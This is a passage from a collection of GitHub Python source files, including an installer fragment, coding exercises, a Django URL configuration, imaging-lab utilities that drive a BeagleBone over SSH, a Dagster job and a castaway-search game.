self.app.locale['data'][31],\n self.app.locale['data'][36],\n lambda: self.tab_changed(0)\n )\n self.json_data = resp.json()\n end_time = time.time()\n self.logger.log(f'JSON downloaded [{self.app.round_point(end_time - start_time, 3)}s]')\n\n def set_stylesheet(self, style_name: str) -> None:\n self.logger.log('Setting stylesheet', style_name)\n self.window.setStyleSheet(self.app.read_text(os.path.join(self.app.files_dir, style_name + '.qss')))\n","repo_name":"gdlocalisation/gdl-installer","sub_path":"installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":20004,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"2172434407","text":"#! 
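# Hedged offline sketch of the fetch-and-time pattern in load_json() above;
# the real code uses requests.get and raises unless status_code == 200. The
# stub below stands in so the snippet runs without a network.
import time

class FakeResponse:                      # stand-in for requests.Response
    status_code = 200
    def json(self):
        return {'binaries-url': 'https://example.invalid/bin'}

start = time.time()
resp = FakeResponse()
if resp.status_code != 200:
    raise RuntimeError('Failed to download code 200 != ' + str(resp.status_code))
data = resp.json()
print('JSON downloaded [%.3fs]' % (time.time() - start), data['binaries-url'])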
/bin/python\nimport config\nimport argparse\nfrom bac.core import Engine\nimport logging\n\n\ndef main():\n argparser = argparse.ArgumentParser()\n try:\n eng = Engine(config)\n eng.init_crawler(argparser)\n args = argparser.parse_args()\n eng.parse_arguments(args)\n except Exception as e:\n logging.error(str(e))\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"wwtg99/bio_api_crawler","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20174799493","text":"import matplotlib.pyplot as plt\nimport csv\n\ntemp=[]\nAve_magnetization=[]\n\n# # h=[]\n# # i=[]\n# # j=[]\n# # a=0.01\n# # for k in range(1,100):\n# # j.append(a*2)\n# # a+=1\n# # plt.plot(j)\n# # plt.savefig('foo.png')\nwith open('Magnetization.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n next(csvfile)\n for row in readCSV:\n print(row[0])\n temp.append(row[0])\n Ave_magnetization.append(row[1])\n next(csvfile)\n\nplt.plot(temp,Ave_magnetization,'-gD')\n# plt.scatter(Ave_magnetization,temp, alpha=0.5)\n# plt.savefig('Temp__Vs__Ave_magnetization.png')\n# # s=area, c=colors,\n# print(temp)\n# print(Ave_magnetization)\n\n# import matplotlib.pyplot as plt\n# import pylab\n\n# x = [1,2,3,4]\n# y = [3,4,8,6]\n\n# plt.scatter(x,y)\n# plt.show()\n# plt.savefig('testing.png')","repo_name":"manand881/Ising_Model_Python","sub_path":"plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23575432790","text":"def reformat(string):\n string = string.replace('-', '').replace('(', '').replace(')', '')\n\n return string[-10:] if len(string) > 7 else '495' + string[-7:]\n\n\nn = 4\nphones = [input() for _ in range(n)]\nfor phone in phones[1:]:\n print('YES' if reformat(phones[0]) == reformat(phone) else 'NO')\n","repo_name":"Gambrinius/Python_Course","sub_path":"week7/phone_numbers.py","file_name":"phone_numbers.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13364120305","text":"'''\nDescribe a recursive algorithm to compute the integer part of the base-two\nlogarithm of n using only addition and integer division.\n'''\ndef log(num,acc=0):\n if num == 1:\n return acc\n else:\n return log(num//2,acc+1)\n \n \n \nprint(log(10))","repo_name":"FuratMAlsmadi/AlgoNinga","sub_path":"Chapter_4/Creativity/C_4.10.py","file_name":"C_4.10.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33133796341","text":"\nwith open(\"input.txt\") as f:\n content = [int(x) for x in f.readlines()]\n\ncontent.append(max(content) + 3)\ncontent.sort()\n\n\nmemo = {0: 1}\n\nfor v in content:\n if v not in memo:\n memo[v] = 0\n for n in [1, 2, 3]:\n if v - n in memo:\n memo[v] += memo[v - n]\n\nprint(memo[max(content)])\nprint(memo)\n","repo_name":"Kehvarl/AdventOfCode_2020","sub_path":"Completed/10.2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12915401325","text":"from django.urls import path\nfrom .views import f_page, private_event_page, public_event_page, public_events, private_events, places, place_page, \\\n user_login, 
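# Hedged miniature of the adapter-chain DP in Main.py (Advent of Code day 10)
# above: memo[v] counts the ways to reach joltage v from 0 in steps of 1-3.
# The toy input below replaces the puzzle file:
adapters = sorted([1, 2, 3])
adapters.append(max(adapters) + 3)      # device adapter -> [1, 2, 3, 6]
memo = {0: 1}
for v in adapters:
    memo[v] = sum(memo.get(v - n, 0) for n in (1, 2, 3))
print(memo[max(adapters)])              # 4 arrangements for this toy input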
logout, user_register, public_events_old, private_events_old, create_private_event, \\\n create_public_event, create_place, unverified_places, unverified_public_events, remove_post,\\\n deleted_places, deleted_public_events, deleted_private_events, comment_remove\n\nurlpatterns = [\n path('', f_page),\n path('Event//', public_event_page, name='priv'),\n path('Event/', public_events),\n path('Event-old/', public_events_old, name='event-old'),\n path('PrivateEvent//', private_event_page),\n path('PrivateEvent/', private_events),\n path('PrivateEvent-old/', private_events_old),\n path('Place/', place_page),\n path('Place/', places),\n path('auth/login/', user_login),\n path(\"auth/logout/\", logout),\n path(\"auth/register/\", user_register),\n path(\"create-private-event/\", create_private_event),\n path(\"create-public-event/\", create_public_event),\n path(\"create-place/\", create_place),\n path(\"unverified-places///\", unverified_places),\n path(\"unverified-places/\", unverified_places),\n path(\"unverified-public-events///\", unverified_public_events),\n path(\"unverified-public-events/\", unverified_public_events),\n path(\"remove-post///\", remove_post),\n path(\"deleted-places///\", deleted_places),\n path(\"deleted-places/\", deleted_places),\n path(\"deleted-public-events///\", deleted_public_events),\n path(\"deleted-public-events/\", deleted_public_events),\n path(\"deleted-private-events///\", deleted_private_events),\n path(\"deleted-private-events/\", deleted_private_events),\n path(\"comment-remove//\", comment_remove),\n]\n","repo_name":"kda2019/InKiev_djangoProject","sub_path":"inkiev/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74586933905","text":"def pair_with_targetsum(arr, target_sum):\n left, right = 0, len(arr) - 1\n\n while left < right:\n curr_sum = arr[left] + arr[right]\n if curr_sum == target_sum:\n return [left, right]\n elif curr_sum > target_sum:\n right -= 1\n else:\n left += 1\n\n# Time Complexity: O(n) b/c we make one pass\n# Space Complexity: O(1) b/c we just initialize curr_sum, left, right","repo_name":"garzeah/algorithms","sub_path":"general/two_pointers/pair_with_target_sum.py","file_name":"pair_with_target_sum.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73824733267","text":"import os, time\nimport glob\n\nfrom numpy import save, load\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom skimage import io\nfrom skimage import color\nfrom skimage import img_as_bool\nfrom skimage.transform import resize\n\nfrom skimage.metrics import structural_similarity as ssim\nfrom skimage.metrics import mean_squared_error\n\nimport scipy.misc\n\nfrom PIL import Image\n\nimport paramiko\n\nimport math\n\nimport colorednoise as cn\n\n# https://stackoverflow.com/questions/2489435/check-if-a-number-is-a-perfect-square\ndef is_square(integer):\n\troot = math.sqrt(integer)\n\treturn integer == int(root + 0.5) ** 2\n\ndef connect_ssh(password):\n\thost = \"192.168.7.2\"\n\tport = 22\n\tusername = \"debian\"\n\t# deprecated, password is passed from GUI input\n\t#password = input(\"Input password for debian@BBB: \")\n\t\n\tssh = paramiko.SSHClient()\n\t\t\t\t\t\t\n\tssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\t\n\ttry:\n\t\tssh.connect(host, port, username, 
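# Hedged standalone check of the two-pointer pattern in
# pair_with_target_sum.py above (restated so it runs on its own; the original
# leaves the "no pair" return implicit):
def pair_with_targetsum(arr, target_sum):
    left, right = 0, len(arr) - 1
    while left < right:
        curr_sum = arr[left] + arr[right]
        if curr_sum == target_sum:
            return [left, right]
        elif curr_sum > target_sum:
            right -= 1
        else:
            left += 1
    return None

assert pair_with_targetsum([1, 2, 3, 4, 6], 6) == [1, 3]
assert pair_with_targetsum([2, 5, 9, 11], 11) == [0, 2]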
password)\t\t\t\t\t\n\t\n\texcept:\n\t\tprint(\"Connecting to BBB failed!\")\n\t\tssh = None\n\t\n\treturn ssh\n\t\ndef execute_remote_command(ssh, command):\n\tstdin, stdout, stderr = ssh.exec_command(command)\n\t#stdin, stdout, stderr = ssh.exec_command(command, get_pty=True)\n\t\n\treturn [stdin, stdout, stderr]\n\t\ndef close_ssh(ssh):\n\tssh.close()\n\n# TODO debug\n# sometimes returns WinError 5 (Permission error) when trying to clear the dir\ndef clear_directory(directory):\n\tfiles_in_folder = glob.glob(directory + '/*')\n\tfor f in files_in_folder:\n\t\tos.remove(f)\n\t\t\ndef save_list_of_lists(list_of_lists, directory, export_mode, resolution):\n\tprint(\"PNG/BMP export mode: \" + str(export_mode))\n\n\t# TODO - change to something more logical\n\t\n\tN = resolution\n\t\n\t# save as .npy for efficient binary IO\n\tif export_mode is False:\n\t\ti = 0\n\t\tfor lst in list_of_lists:\n\t\t\tj = 0\n\t\t\tfor el in lst:\n\t\t\t\tsave(directory + 'name_' + str(i) + '_' + str(j) + '.npy', el, allow_pickle=False)\n\t\t\t\tj += 1\n\t\t\ti += 1\n\t\t\n\t\tprint(\"Done saving patterns!\")\n\t\t\n\t# save as .png in 1920x1080 for DMD display \n\telif export_mode is True:\n\t\ti = 0\n\t\tfor lst in list_of_lists:\n\t\t\tj = 0\n\t\t\tfor el in lst:\n\t\t\t\t# doesn't work well for small arrays\n\t\t\t\t#el_resized_square = np.resize(el, (360,360))\n\t\t\t\t\n\t\t\t\t# temporary workaround -> padding the small array\n\t\t\t\tarr_shape = np.shape(el)\n\t\t\t\tpad_dim_y = int((360 - arr_shape[0]) / 2)\n\t\t\t\tpad_dim_x = int((360 - arr_shape[1]) / 2)\n\t\t\t\tel_resized_square = np.pad(el, ((pad_dim_y, pad_dim_x), \n\t\t\t\t\t\t\t\t\t\t\t\t(pad_dim_y, pad_dim_x)), \n\t\t\t\t\t\t\t\t\t\t\t\t'constant', \n\t\t\t\t\t\t\t\t\t\t\t\tconstant_values=0)\n\t\t\t\t\n\t\t\t\tel_resized_padded = np.pad(el_resized_square, \n\t\t\t\t\t\t\t\t\t\t ((0,0), (140,140)), \n\t\t\t\t\t\t\t\t\t\t 'constant', \n\t\t\t\t\t\t\t\t\t\t constant_values=0)\n\t\t\t\t\t\t\t\t\t\t \n\t\t\t\timg = Image.fromarray((np.real(el_resized_padded) * 255 ))\n\t\t\t\t# change bit depth to 24-bit True Color - the only format accepted by DLP2000 default display software\n\t\t\t\timg_24 = img.convert(\"RGB\")\n\t\t\t\timg_24.save(directory + str(i) + '_' + str(j) + '.bmp')\n\t\t\t\tj += 1\n\t\t\ti += 1\n\t\t\n\t\tprint(\"Done saving patterns!\")\n\n\telse:\n\t\tprint(\"Export mode error!\")\n\n# https://stackoverflow.com/questions/6494102/how-to-save-and-load-an-array-of-complex-numbers-using-numpy-savetxt\ndef save_measurements(meas, file):\n\t# convert meas list to numpy array\n\tmeas_arr = np.array(meas)\n\t# save the array as real (reinterpreted)\n\tnp.savetxt(file + '.txt', meas_arr.view(float))\n\ndef save_measurement_vector(meas, file):\n\t# convert meas list to numpy array\n\tmeas_arr = np.array(meas)\n\t# save the array as real (reinterpreted)\n\tnp.savetxt(file + '.txt', meas_arr.view(int))\n\ndef load_measurements(file):\n\t# load the array as complex \n\ttry:\n\t\tmeas_load = np.loadtxt(file + '.txt').view(complex)\n\t\t\n\texcept:\n\t\tprint(\"Error opening file!\")\n\t\tmeas_load = []\n\t\t\n\treturn meas_load\n\t\ndef load_measurements_real(file):\n\t# load the array as complex \n\ttry:\n\t\tmeas_load = np.loadtxt(file + '.txt').view(float)\n\t\t\n\texcept:\n\t\tprint(\"Error opening file!\")\n\t\tmeas_load = []\n\t\t\n\treturn meas_load\n\t\n# TODO mode\ndef load_list_of_lists(directory, mode):\n\tdir_list = os.listdir(directory)\n\t\n\tlist_of_lists = []\n\ttemp_list = []\n\t\n\ti = 0\n\tfor el in 
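# Hedged round-trip of the complex-array I/O trick used by save_measurements()
# and load_measurements() above: viewing a complex array as float doubles its
# length for savetxt, and .view(complex) restores it on load.
import os, tempfile
import numpy as np

meas = np.array([1 + 2j, 3 - 4j, 0.5 + 0j])
fn = os.path.join(tempfile.mkdtemp(), 'meas.txt')
np.savetxt(fn, meas.view(float))
assert np.allclose(np.loadtxt(fn).view(complex), meas)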
dir_list:\n\t\ttemp_list.append(load(directory + el))\n\t\t\n\t\ti+=1\n\t\t\n\t\tif i == 3:\n\t\t\tlist_of_lists.append(temp_list)\n\t\t\ttemp_list = []\n\t\t\ti = 0\n\t\t\t\n\tprint(\"Done loading patterns!\")\n\n\treturn list_of_lists\n\ndef save_image(image, img_name, directory):\n\t#save(str(directory) + str(img_name) + '_.bmp', image, allow_pickle=False)\n\timg = Image.fromarray(image)\n\timg_24 = img.convert(\"RGB\")\n\timg_24.save(str(directory) + str(img_name) + '.bmp')\n\ndef save_image_complex(image, img_name, directory):\n\trescaled = (255.0 / image.max() * (image - image.min())).astype(np.uint8)\n\t#rescaled = image\n\t#rescaled *= 255.0 / rescaled.max()\n\t#rescaled = rescaled.astype(np.uint8)\n\timg = Image.fromarray(rescaled)\n\timg.save(str(directory) + str(img_name) + '.png')\n\ndef load_image(filename):\n\timage = io.imread(filename)\n\t\n\timage_gray = color.rgb2gray(image)\n\n\treturn image_gray\n\t\ndef resize_image(image, resolution):\n\tN = resolution\n\timage_resized = resize(image, (N, N))\n\t\n\treturn image_resized\n\n# displays multiple images in one window\n# doesn't work for reconstructions of real world measurements, due to a type error!\ndef show_images(images, cols = 2, titles = None):\n\t\"\"\"Display a list of images in a single figure with matplotlib.\n\t\n\tParameters\n\t---------\n\timages: List of np.arrays compatible with plt.imshow.\n\t\n\tcols (Default = 1): Number of columns in figure (number of rows is \n\t\t\t\t\t\tset to np.ceil(n_images/float(cols))).\n\t\n\ttitles: List of titles corresponding to each image. Must have\n\t\t\tthe same length as titles.\n\t\"\"\"\n\tplt.rcParams.update({'font.size': 16})\n\t\n\tassert((titles is None)or (len(images) == len(titles)))\n\tn_images = len(images)\n\tif titles is None: titles = ['Image (%d)' % i for i in range(1,n_images + 1)]\n\tfig = plt.figure()\n\tfor n, (image, title) in enumerate(zip(images, titles)):\n\t\ta = fig.add_subplot(cols, np.ceil(n_images/float(cols)), n + 1)\n\t\t#if image.ndim == 2:\n\t\tplt.summer()\n\t\tplt.imshow(image)\n\t\ta.set_title(title)\n\tfig.set_size_inches(np.array(fig.get_size_inches()) * n_images)\n\t\n\t#plt.savefig('./GALLERY/reconstruction.eps', format='eps')\n\tplt.savefig('./GALLERY/reconstruction.png')\n\t#plt.show()\n\t\ndef plot_list(data_list):\n\t#x = list(range(1, len(data_list)+1))\n\tplt.xlabel(\"Pattern number\")\n\tplt.ylabel(\"Measured intensity\")\n\tplt.plot(data_list)\n\t\n\t#plt.savefig('./GALLERY/vector.eps', format='eps')\n\tplt.savefig('./GALLERY/vector.png')\n\tplt.show()\n\t\ndef calculate_PSNR(ground_truth, reconstructed_image):\n\tMSE = mean_squared_error(ground_truth, np.real(reconstructed_image))\n\tPSNR = 10*math.log10(ground_truth.max()**2 / MSE)\n\n\treturn (MSE, PSNR)\n\t\ndef calculate_SSIM(ground_truth, reconstructed_image):\n\tSSIM = ssim(ground_truth, np.real(reconstructed_image))\n\n\treturn SSIM\n\n# TODO: change to 2D\n# https://www.socsci.ru.nl/wilberth/python/noise.html\ndef spectrum_noise(spectrum_func, samples=1024, rate=44100):\n \"\"\" \n make noise with a certain spectral density\n \"\"\"\n freqs = np.fft.rfftfreq(samples, 1.0/rate) # real-fft frequencies (not the negative ones)\n spectrum = np.zeros_like(freqs, dtype='complex') # make complex numbers for spectrum\n spectrum[1:] = spectrum_func(freqs[1:]) # get spectrum amplitude for all frequencies except f=0\n phases = np.random.uniform(0, 2*np.pi, len(freqs)-1) # random phases for all frequencies except f=0\n spectrum[1:] *= np.exp(1j*phases) # apply random phases\n 
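# Hedged numeric check of the formula in calculate_PSNR() above,
# PSNR = 10*log10(peak**2 / MSE), on a tiny made-up image pair:
import math
import numpy as np

truth = np.array([[0.0, 1.0], [1.0, 0.0]])
recon = np.array([[0.1, 0.9], [1.0, 0.0]])
mse = np.mean((truth - recon) ** 2)                 # 0.005
psnr = 10 * math.log10(truth.max() ** 2 / mse)      # ~23.01 dB
assert abs(mse - 0.005) < 1e-12
print('MSE=%.4f, PSNR=%.2f dB' % (mse, psnr))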
noise = np.fft.irfft(spectrum) # return the reverse fourier transform\n noise = np.pad(noise, (0, samples - len(noise)), 'constant') # add zero for odd number of input samples\n \n return noise\n\n# https://www.socsci.ru.nl/wilberth/python/noise.html\ndef pink_spectrum(f, f_min=0, f_max=np.inf, att=np.log10(2.0)*10):\n \"\"\"\n Define a pink (1/f) spectrum\n f = array of frequencies\n f_min = minimum frequency for band pass\n f_max = maximum frequency for band pass\n att = attenuation per factor two in frequency in decibel.\n Default is such that a factor two in frequency increase gives a factor two in power attenuation.\n \"\"\"\n # numbers in the equation below explained:\n # 0.5: take the square root of the power spectrum so that we get an amplitude (field) spectrum \n # 10.0: convert attenuation from decibel to bel\n # 2.0: frequency factor for which the attenuation is given (octave)\n s = f**-( 0.5 * (att/10.0) / np.log10(2.0) ) # apply attenuation\n s[np.logical_or(f < f_min, f > f_max)] = 0 # apply band pass\n return s\n\n# TODO\ndef add_noise(image, noise_type, magnitude):\n\tnoisy_image = image\n\tN = image.shape[0]\n\n\t# https://numpy.org/doc/stable/reference/random/generated/numpy.random.rand.html\n\tif noise_type == \"white\":\n\t\tnoisy_image += magnitude * np.random.rand(image.shape[0], image.shape[1])\n\t\t\n\t# https://www.socsci.ru.nl/wilberth/python/noise.html\n\telif noise_type == \"pink\":\n\t\tpass\n\n\telif noise_type == \"pink_2\":\n\t\t# check if it can take a tuple/N-dimensional\n\t\tcn.powerlaw_psd_gaussian(1, (N, N))\n\t\t\n\telif noise_type == \"blue\":\n\t\t# a possible implementation: https://github.com/MomentsInGraphics/BlueNoise/blob/master/BlueNoise.py\n\t\tpass\n\t\t\n\telif noise_type == \"brown\":\n\t\t# check if it can take a tuple/N-dimensional\n\t\tcn.powerlaw_psd_gaussian(2, (N, N))\n\n\telse:\n\t\tprint(\"Incorrect noise type selected!\")\n\n\treturn noisy_image","repo_name":"f-labaj/SPI-S-portable","sub_path":"auxiliary_functions.py","file_name":"auxiliary_functions.py","file_ext":"py","file_size_in_byte":9423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31208057617","text":"\"\"\"\r\nAlex Chaban\r\nDue 03-31-2023\r\nProf. Ionut Cardei\r\nCOP4045\r\nProblem 2: Functional Programming\r\n\"\"\"\r\n\r\nfrom itertools import islice, filterfalse\r\nimport functools\r\n\r\n\"\"\"\r\nBoilerplate Generator taken from Problem 1\r\nDescription: Generates a random sequence of numbers based on the LCG formula.\r\nConditions: A seed x0, and a number of generations n.\r\nMust use a yield generator.\r\n\"\"\"\r\ndef rnd_gen(x0, n):\r\n it = 0\r\n m = 2**32\r\n a = 22695477\r\n c = 1\r\n while it != n:\r\n x0 = ((a*x0 + c) % m)\r\n yield x0\r\n it += 1\r\n\r\n\"\"\"\r\nPart A: Infinite tuple generator\r\nDescription: Generates a random sequence of tuples (a, b)\r\nwhere a and b are integers generated from rnd_gen(1, -1)\r\nConditions: 0 <_ a <_ b < m. 
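# Hedged miniature of spectrum_noise() above: a flat (white) amplitude
# spectrum with random phases, inverted by irfft, gives real-valued noise of
# the requested length. Sample count and rate below are arbitrary.
import numpy as np

samples, rate = 16, 100
freqs = np.fft.rfftfreq(samples, 1.0 / rate)
spectrum = np.zeros_like(freqs, dtype=complex)
spectrum[1:] = 1.0                                    # amplitude for f > 0
spectrum[1:] *= np.exp(1j * np.random.uniform(0, 2 * np.pi, len(freqs) - 1))
noise = np.fft.irfft(spectrum, n=samples)             # n= handles odd lengths
assert noise.shape == (samples,) and np.isrealobj(noise)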
m must be a number.\r\nMust use a yield generator.\r\n\"\"\"\r\ndef gen_rndtup(m):\r\n temp_gen = iter(rnd_gen(1, -1))\r\n\r\n while True:\r\n a, b = (next(temp_gen) % m), (next(temp_gen) % m)\r\n\r\n if b >= a:\r\n yield((a,b))\r\n\r\n\"\"\"\r\nMAIN FUNCTION\r\n\"\"\"\r\ndef main():\r\n print('Part A (remains unprinted as it is infinite):')\r\n #print([i for i in gen_rndtup(10)])\r\n\r\n print('Part B:')\r\n first_eight = islice(gen_rndtup(10), 8)\r\n print(list(filterfalse(lambda x : x[0] + x[1] >= 6, first_eight)))\r\n\r\n print('Part C:')\r\n piece_one = iter(rnd_gen(1, -1))\r\n piece_two = iter(rnd_gen(2, -1))\r\n l_a = []\r\n l_b = [] #two generators, two maps to zip\r\n for i in range(0,8):\r\n a, b = (next(piece_one) % 100), (next(piece_two) % 100)\r\n l_a.append(a)\r\n l_b.append(b)\r\n l = zip(l_a, l_b)\r\n print(list(filterfalse(lambda x : x[0] > x[1], l))) #filters out any case of a > b\r\n\r\n print('Part D:')\r\n d_gen = islice(rnd_gen(1, -1), 10)\r\n l = list(i for i in d_gen)\r\n l = map(lambda x : x % 100, l)\r\n l = filter(lambda x : x % 13 == 0, l)\r\n print(list(l))\r\n\r\n print('Part E:') #fix\r\n e_gen = islice(gen_rndtup(10), 10)\r\n l = filter(lambda x : x[0] + x[1] >= 5, e_gen)\r\n l = map(lambda x : x[0] + x[1], l)\r\n l = functools.reduce(lambda a, b : a + b, l)\r\n print(l)\r\n\r\nmain()\r\n","repo_name":"alexsocial/PythonCourse","sub_path":"FuncSlicing.py","file_name":"FuncSlicing.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10789394876","text":"import requests\nimport csv\nfrom dagster import job, op, get_dagster_logger\n\n\n@op\ndef download_cereals():\n response = requests.get(\"https://docs.dagster.io/assets/cereal.csv\")\n lines = response.text.split(\"\\n\")\n return [row for row in csv.DictReader(lines)]\n\n\n@op\ndef find_sugariest(cereals):\n sorted_by_sugar = sorted(cereals, key=lambda cereal: cereal[\"sugars\"])\n get_dagster_logger().info(f'{sorted_by_sugar[-1][\"name\"]} is the sugariest cereal')\n\n\n@job\ndef serial():\n find_sugariest(download_cereals())\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/dagster/serial_job.py","file_name":"serial_job.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"31488842507","text":"\"\"\"\n\nTP#16-rescate de naufragos - TRABAJO 5\n\n\"\"\"\n\n#> creo el maximo del tablero: \n\nEje_x_maximo = int(input(\"Ingrese el maximo del eje x del tablero del juego: \"))\nEje_y_maximo = int(input(\"Ingrese el maximo del eje y del tablero del juego: \"))\nExtencion_maxima_del_tablero = (Eje_x_maximo,Eje_y_maximo)\n\nprint(\"Extencion maxima del tablero: \", Eje_x_maximo, \"x\", Eje_y_maximo)\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n#> creo las posiciones de la cantidad de naufragos que quiero:\n \nMaximo_de_naufragos = int(input(\"Ingrese maximo de naufragos: \"))\n\nimport random\n\n#para determinar si me exedo con la cantidad de naufragos que puedo colocar en el tabler, volver a pedir valores correctos\n\nwhile Maximo_de_naufragos > (Eje_x_maximo * Eje_y_maximo):\n print(\"\\nNo es posible ingresar esa cantidad de naufragos en el tablero. Ingrese un tablero mas grande o coloque menos naufragos. 
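# Hedged standalone sketch of the LCG-plus-itertools pipeline in
# FuncSlicing.py above (same m, a, c constants; the take-count is made up):
from itertools import islice, filterfalse

def rnd_gen(x0, n=-1):
    m, a, c = 2**32, 22695477, 1
    it = 0
    while it != n:
        x0 = (a * x0 + c) % m
        yield x0
        it += 1

first = list(islice(rnd_gen(1), 5))
odd_only = list(filterfalse(lambda x: x % 2 == 0, first))
print(first, odd_only)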
\\n\")\n \n Eje_x_maximo = int(input(\"Ingrese el maximo del eje x del tablero del juego: \"))\n Eje_y_maximo = int(input(\"Ingrese el maximo del eje y del tablero del juego: \"))\n Extencion_maxima_del_tablero = (Eje_x_maximo,Eje_y_maximo)\n\n print(\"Extencion maxima del tablero: \", Eje_x_maximo, \"x\", Eje_y_maximo)\n\n Maximo_de_naufragos = int(input(\"Ingrese nuevamente el maximo de naufragos: \"))\n\n\n#random.sample(population, k)\n\n#Creo la lista donde coloco los pares de los naufragos, otra para poner solo las x y otro para poner solo las y\n\nlista_de_posiciones_de_naufragos = []\n\nlista_de_posiciones_de_naufragos_en_x = []\n\nlista_de_posiciones_de_naufragos_en_y = []\n\nfor naufrago in range(0, Maximo_de_naufragos):\n \n Posicion_del_naufrago_en_eje_X = random.randint(1, Eje_x_maximo)\n Posicion_del_naufrago_en_eje_Y = random.randint(1, Eje_y_maximo)\n Posicion_del_naufrago = (Posicion_del_naufrago_en_eje_X, Posicion_del_naufrago_en_eje_Y)\n #Posicion_del_naufrago = list(Posicion_del_naufrago)\n \n \n while Posicion_del_naufrago in lista_de_posiciones_de_naufragos:\n Posicion_del_naufrago_en_eje_X = random.randint(1, Eje_x_maximo)\n Posicion_del_naufrago_en_eje_Y = random.randint(1, Eje_y_maximo)\n Posicion_del_naufrago = (Posicion_del_naufrago_en_eje_X, Posicion_del_naufrago_en_eje_Y)\n \n \n else:\n \n lista_de_posiciones_de_naufragos.append(Posicion_del_naufrago)\n \n lista_de_posiciones_de_naufragos_en_x.append(Posicion_del_naufrago_en_eje_X)\n \n lista_de_posiciones_de_naufragos_en_y.append(Posicion_del_naufrago_en_eje_Y)\n\n\"\"\" \nprint(lista_de_posiciones_de_naufragos)\nprint(lista_de_posiciones_de_naufragos_en_x)\nprint(lista_de_posiciones_de_naufragos_en_y)\n\"\"\"\n\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n#> pedir la cantidad de sondas que uno quiere usar y dsp si encuentra un naufrago\n\nMaximo_de_sondas = int(input(\"Ingrese maximo de sondas: \"))\n\nContador_de_naufragos = Maximo_de_naufragos\nContador_de_sondas = Maximo_de_sondas\n\n\nfor sonda in range(0, Maximo_de_sondas): #repite la cantidad de sondas que tengas\n \n if Contador_de_naufragos == 0:\n break\n \n Posicion_de_la_sonda_en_eje_X = int(input(f\"Ingrese la posicion en el eje x de la sonda numero {sonda + 1}: \"))\n Posicion_de_la_sonda_en_eje_Y = int(input(f\"Ingrese la posicion en el eje y de la sonda numero {sonda + 1}: \"))\n Posicion_de_la_sonda = (Posicion_de_la_sonda_en_eje_X, Posicion_de_la_sonda_en_eje_Y)\n \n \n \n if Posicion_de_la_sonda in lista_de_posiciones_de_naufragos: #si la posicion de la sonda agregada esta en la lista de naufragos\n print(f\"Encontraste a un naufrago en la posicion {Posicion_de_la_sonda}\")\n lista_de_posiciones_de_naufragos.remove(Posicion_de_la_sonda) #elimina al naufrago que se genero en la lista para que no se repita\n \n lista_de_posiciones_de_naufragos_en_x.remove(Posicion_de_la_sonda_en_eje_X)\n\n lista_de_posiciones_de_naufragos_en_y.remove(Posicion_de_la_sonda_en_eje_Y)\n \n Contador_de_naufragos = Contador_de_naufragos - 1 #disminuye la cantidad de naufragos a busacar\n Contador_de_sondas = Contador_de_sondas - 1 #disminuyen las sondas disponibles\n \n #print(lista_de_posiciones_de_naufragos)\n #print(lista_de_posiciones_de_naufragos_en_x)\n #print(lista_de_posiciones_de_naufragos_en_y)\n \n elif Posicion_de_la_sonda_en_eje_X in lista_de_posiciones_de_naufragos_en_x:\n Contador_de_sondas = Contador_de_sondas - 1 #disminuyen 
las sondas disponibles\n print(\"Hay un naufrago en el mismo eje x\")\n \n elif Posicion_de_la_sonda_en_eje_Y in lista_de_posiciones_de_naufragos_en_y:\n Contador_de_sondas = Contador_de_sondas - 1 #disminuyen las sondas disponibles\n print(\"Hay un naufrago en el mismo eje y\")\n\n \n \n else:\n Contador_de_sondas = Contador_de_sondas - 1 #disminuyen las sondas disponibles\n print(\"No encontraste a ningun naufrago, ni tampoco se encuentra un naufrago en ninguno de los dos ejes\")\n\n print(f\"Sondas disponibles: {Contador_de_sondas}\")\n print(f\"Naufragos por encontrar: {Contador_de_naufragos}\")\n \n \n\nif Contador_de_naufragos == 0:\n print(\"\\n¡Encontraste a todos los naufragos!\")\nelse:\n print(f\"Te faltaron por encontrar {Contador_de_naufragos} naufragos\")\n\n#print(lista_de_posiciones_de_naufragos)\n \n#else:\n #print(\"No encontraste un naufrago\")\n \n","repo_name":"GatitoEnojado/Tareas-Programacion","sub_path":"Juego del Naufrago DEFINITIVO.py","file_name":"Juego del Naufrago 